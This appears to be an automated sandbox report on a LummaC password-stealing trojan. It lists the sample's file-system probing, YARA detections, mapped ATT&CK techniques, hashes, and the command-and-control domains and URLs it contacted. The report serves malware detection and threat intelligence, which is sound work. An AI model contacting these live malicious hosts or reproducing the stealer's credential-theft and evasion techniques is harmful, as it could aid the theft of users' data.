Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 00000000.00000002.1407265814.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1409033013.0000000003C04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe PID: 7972, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	2 OS Credential Dumping	321 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Obfuscated Files or Information	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	31 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	12 Software Packing	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	21 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	76%	Virustotal		Browse
SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	89%	ReversingLabs	Win32.Trojan.LummaStealer
SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe	100%	Avira	HEUR/AGEN.1314134

Source	Detection	Scanner	Label
https://digilayerx.digital/X	0%	Avira URL Cloud	safe
https://digilayerx.digital/hmandl	0%	Avira URL Cloud	safe
https://digilayerx.digital/h	0%	Avira URL Cloud	safe
https://digilayerx.digital/	0%	Avira URL Cloud	safe
https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=af0686121de0562840_555246021998	0%	Avira URL Cloud	safe
https://digilayerx.digital/hmandn?	0%	Avira URL Cloud	safe
https://digilayerx.digital:443/hmand	100%	Avira URL Cloud	malware
porcupineq.digital/gsoz	100%	Avira URL Cloud	malware
https://digilayerx.digital/hmand#	100%	Avira URL Cloud	malware
https://digilayerx.digital/hmand	100%	Avira URL Cloud	malware

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
t.me	149.154.167.99	true	false		high
digilayerx.digital	172.67.146.208	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://t.me/wermnjgk34	false		high
https://digilayerx.digital/hmand	false	Avira URL Cloud: malware	unknown
liftally.top/xasj	false		high
nighetwhisper.top/lekd	false		high
salaccgfa.top/gsooz	false		high
porcupineq.digital/gsoz	true	Avira URL Cloud: malware	unknown
changeaie.top/geps	false		high
starofliught.top/wozd	false		high
quilltayle.live/gksi	false		high
piratetwrath.run/ytus	false		high
zestmodp.top/zeda	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://t.me/	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1270220814.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://digilayerx.digital/hmandn?	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1406643320.000000000101E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1408190345.000000000101E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://digilayerx.digital/X	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1373503974.0000000001028000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1408224347.0000000001028000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1406509269.0000000001028000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1365920545.0000000001025000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://web.telegram.org	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1343228241.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1342594564.000000000103B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.enigmaprotector.com/openU	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1407265814.0000000000A3D000.00000040.00000001.01000000.00000003.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1342594564.000000000103B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://digilayerx.digital/	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1406509269.0000000001028000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1325815469.000000000101E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1365920545.0000000001025000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1342594564.000000000103B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1329735693.000000000402A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://digilayerx.digital/hmand#	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1325815469.000000000101E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://digilayerx.digital:443/hmand	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1373503974.000000000103D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/v20	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1342594564.000000000103B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://digilayerx.digital/hmandl	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1365920545.0000000001032000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1406765317.0000000001037000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1406509269.0000000001028000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1365953673.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1325815469.0000000001032000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1355256191.0000000001032000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1343228241.0000000001032000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1408275091.0000000001038000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1373503974.0000000001032000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1342594564.000000000103B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://web.telegram.orgX-Frame-OptionsALLOW-FROM	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1270220814.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1326832246.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv209h	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1342594564.000000000103B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1342594564.000000000103B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://digilayerx.digital/h	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1373503974.0000000001028000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1408224347.0000000001028000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1406509269.0000000001028000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=af0686121de0562840_555246021998	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1270220814.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.enigmaprotector.com/	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000002.1407265814.0000000000A3D000.00000040.00000001.01000000.00000003.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1329735693.000000000402A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, 00000000.00000003.1291697294.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.146.208	digilayerx.digital	United States		13335	CLOUDFLARENETUS	false
149.154.167.99	t.me	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1673872
Start date and time:	2025-04-25 08:54:24 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@2/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.29.183.29, 4.175.87.197
Excluded domains from analysis (whitelisted): c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe, PID 7972 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:55:18	API Interceptor	8x Sleep call for process: SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.146.208	RFQ_No._64002292TMS.pdf.exe	Get hash	malicious	FormBook	Browse	www.motorcycleglassesshop.com/sy22/?CPFX=sXRlvNy&IPL=Qqmm1z9pW/n+7Nmk6IYgEg2+rsXB4WJ3/wvzpkweXsTUTfjB8d7hFHgyOXtq65+NE9hg
	ecSAVbtTYl.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.motorcycleglassesshop.com/sy22/?BRd=UVCh0FUHgn6dYHj&N4-DPrg=Qqmm1z8dWfiOm97Qm4YgEg2+rsXB4WJ3/wvzpkweXsTUTfjB8d7hFHgyOXtAlJONA/pg
	Ossi4Owf4L.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.motorcycleglassesshop.com/sy22/?Eta4qp=arFtf6jHK6_T_b&CZ6=Qqmm1z9sKoj+79iv6IYgEg2+rsXB4WJ3/wvzpkweXsTUTfjB8d7hFHgyOUNQqoe1eaAn
	BL_DRAFT_AND_PACKING_LIST.xls	Get hash	malicious	FormBook, NSISDropper	Browse	www.motorcycleglassesshop.com/sy22/?1bVta=Qqmm1z9pKvj67tuj4IYgEg2+rsXB4WJ3/w3j1nsfTMTVTuPH7NqtTDYwNyBWhZK+L80QOw==&8pMd-=qzrxn4m85tPHZZ2P
	UEkZKXQ45N.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.motorcycleglassesshop.com/sy22/?nPqLWN=Qqmm1z9sKoj+79iv6IYgEg2+rsXB4WJ3/wvzpkweXsTUTfjB8d7hFHgyOXtq65+NE9hg&JjEHH=-ZVhNlD
	DHL_CUSTOM_ENTRY_FORM.xls	Get hash	malicious	FormBook, NSISDropper	Browse	www.motorcycleglassesshop.com/sy22/?vp=2dhH2zTPeZG0&p0DdAR=Qqmm1z9pKvj67tuj4IYgEg2+rsXB4WJ3/w3j1nsfTMTVTuPH7NqtTDYwNyBWhZK+L80QOw==
	BALANCE_CONFIRMATION.xls	Get hash	malicious	FormBook	Browse	www.motorcycleglassesshop.com/sy22/?m4=Qqmm1z9pKvj67tuj4IYgEg2+rsXB4WJ3/w3j1nsfTMTVTuPH7NqtTDYwNyBWhZK+L80QOw==&e8k8af=KJExjRk896m
149.154.167.99	http://45.142.208.144.sslip.io/blog/	Get hash	malicious	Unknown	Browse	telegram.org/img/emoji/40/F09F9889.png
	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	TqZgjwtZgd.exe	Get hash	malicious	DarkTortilla, LummaC Stealer	Browse	149.154.167.99
	BvcedLD5mF.exe	Get hash	malicious	Amadey, Credential Flusher, Healer AV Disabler, LummaC Stealer	Browse	149.154.167.99
	udAmw5wplU.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	tBGRokDJzY.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	QuantumLoader v3.56.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	QuantumLoader v3.56.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	random.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, Quasar, RHADAMANTHYS, XWorm	Browse	149.154.167.99
	http://heartandsoilsupplements.com/	Get hash	malicious	Unknown	Browse	3.163.125.51
digilayerx.digital	udAmw5wplU.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.10.223
	tBGRokDJzY.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.146.208
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.146.208

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	emf-PO49382.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	TqZgjwtZgd.exe	Get hash	malicious	DarkTortilla, LummaC Stealer	Browse	149.154.167.99
	BvcedLD5mF.exe	Get hash	malicious	Amadey, Credential Flusher, Healer AV Disabler, LummaC Stealer	Browse	149.154.167.99
	udAmw5wplU.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	h5JSlg2hmS.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	149.154.167.220
	tBGRokDJzY.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	robloxrevival2018.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	QuantumLoader v3.56.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	QuantumLoader v3.56.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
CLOUDFLARENETUS	k3.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	DwF4GJgjCD.exe	Get hash	malicious	Unknown	Browse	104.21.112.1
	8suRm97heD.exe	Get hash	malicious	Unknown	Browse	104.21.80.1
	SIx07AScmI.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.151.40
	DwF4GJgjCD.exe	Get hash	malicious	Unknown	Browse	104.21.48.1
	wbKgknfXfJ.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	172.67.205.184
	PSUST6SAUy.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.72.140
	TqZgjwtZgd.exe	Get hash	malicious	DarkTortilla, LummaC Stealer	Browse	172.67.205.184
	BvcedLD5mF.exe	Get hash	malicious	Amadey, Credential Flusher, Healer AV Disabler, LummaC Stealer	Browse	172.67.205.184
	vLAkPyea6v.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.151.40

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	DwF4GJgjCD.exe	Get hash	malicious	Unknown	Browse	172.67.146.208 149.154.167.99
	8suRm97heD.exe	Get hash	malicious	Unknown	Browse	172.67.146.208 149.154.167.99
	SIx07AScmI.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.146.208 149.154.167.99
	DwF4GJgjCD.exe	Get hash	malicious	Unknown	Browse	172.67.146.208 149.154.167.99
	wbKgknfXfJ.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	172.67.146.208 149.154.167.99
	PSUST6SAUy.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.146.208 149.154.167.99
	TqZgjwtZgd.exe	Get hash	malicious	DarkTortilla, LummaC Stealer	Browse	172.67.146.208 149.154.167.99
	BvcedLD5mF.exe	Get hash	malicious	Amadey, Credential Flusher, Healer AV Disabler, LummaC Stealer	Browse	172.67.146.208 149.154.167.99
	vLAkPyea6v.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.146.208 149.154.167.99
	8suRm97heD.exe	Get hash	malicious	Unknown	Browse	172.67.146.208 149.154.167.99

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.991580056975806
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.PWS.Lumma.2678.30443.7169.exe
File size:	1'300'480 bytes
MD5:	1b88c863822e876c446546c9de795f6a
SHA1:	1f671531ff994f929e2c8d372212b319ec71ea1b
SHA256:	0b412e85f994c1389867c8626819145c2da151b0f405e2d13707c2a66cbd974d
SHA512:	856a5bdd784dbabb51d26b3d335c6f51233e3c0f6c83d20e0062c6f31c39f7f9f80cc7a89ee2112a2854c8f8875ceb1986be0153851424971c416dfb4951b9ed
SSDEEP:	24576:52aBFA5GlCxgOPgggbu1NpArjwzx1mWlLssrKodqkKUt4dkAWy/X51M:XIlxkggbShznmW9d/qpXks/
TLSH:	B755338C3A61AE25D97A4872D0F6630F7A3C4278C3753DE7F12BB05625779E90D2980B
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....y.h.............................D............@..........................P<...........@................................. ......

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4144d7
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
